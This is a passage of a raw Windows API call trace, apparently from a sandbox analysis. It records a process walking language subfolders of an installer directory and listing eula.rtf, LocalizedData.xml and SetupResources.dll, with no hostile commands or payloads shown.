ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.748] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.748] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.748] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.748] FindClose (in: hFindFile=0x677b30 | out: hFindFile=0x677b30) returned 1 [0158.748] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.748] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1049", cAlternateFileName="")) returned 1 [0158.748] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.748] lstrlenW (lpString="1049") returned 4 [0158.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.790] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677eb0 [0158.790] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.791] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.791] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd4b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.791] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.791] lstrlenW (lpString="eula.rtf") returned 8 [0158.791] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x6a3260 [0158.791] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13e4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.791] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.791] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.791] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x6a19b8 [0158.791] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.791] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.791] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.792] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.792] FindClose (in: hFindFile=0x677eb0 | out: hFindFile=0x677eb0) returned 1 [0158.792] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.792] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1053", cAlternateFileName="")) returned 1 [0158.792] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.792] lstrlenW (lpString="1053") returned 4 [0158.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.792] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677eb0 [0158.793] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.793] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.793] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf19, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.793] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.793] lstrlenW (lpString="eula.rtf") returned 8 [0158.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x6a27e0 [0158.793] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12f70, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.793] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.794] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.794] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x6a1ef8 [0158.794] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.794] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.794] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.794] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.794] FindClose (in: hFindFile=0x677eb0 | out: hFindFile=0x677eb0) returned 1 [0158.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.794] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1055", cAlternateFileName="")) returned 1 [0158.794] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.794] lstrlenW (lpString="1055") returned 4 [0158.794] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.794] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677b30 [0158.795] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.795] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.795] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf13, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.796] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.796] lstrlenW (lpString="eula.rtf") returned 8 [0158.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x6a3458 [0158.796] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12c12, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.796] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.796] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x6a2378 [0158.796] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.796] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.796] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.796] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.796] FindClose (in: hFindFile=0x677b30 | out: hFindFile=0x677b30) returned 1 [0158.797] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.797] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2052", cAlternateFileName="")) returned 1 [0158.797] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.797] lstrlenW (lpString="2052") returned 4 [0158.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.797] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677bb0 [0158.797] FindNextFileW (in: hFindFile=0x677bb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.797] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.797] FindNextFileW (in: hFindFile=0x677bb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x16c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.797] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.797] lstrlenW (lpString="eula.rtf") returned 8 [0158.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x6a2930 [0158.798] FindNextFileW (in: hFindFile=0x677bb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.798] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.798] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x6a1a78 [0158.798] FindNextFileW (in: hFindFile=0x677bb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.798] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.798] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.798] FindNextFileW (in: hFindFile=0x677bb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.798] FindClose (in: hFindFile=0x677bb0 | out: hFindFile=0x677bb0) returned 1 [0158.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.798] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2070", cAlternateFileName="")) returned 1 [0158.798] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.798] lstrlenW (lpString="2070") returned 4 [0158.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.799] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677bb0 [0158.799] FindNextFileW (in: hFindFile=0x677bb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.799] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.799] FindNextFileW (in: hFindFile=0x677bb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.799] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.799] lstrlenW (lpString="eula.rtf") returned 8 [0158.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x6a3068 [0158.799] FindNextFileW (in: hFindFile=0x677bb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1397e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.799] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.799] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x6a2078 [0158.800] FindNextFileW (in: hFindFile=0x677bb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.800] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.800] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.800] FindNextFileW (in: hFindFile=0x677bb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", 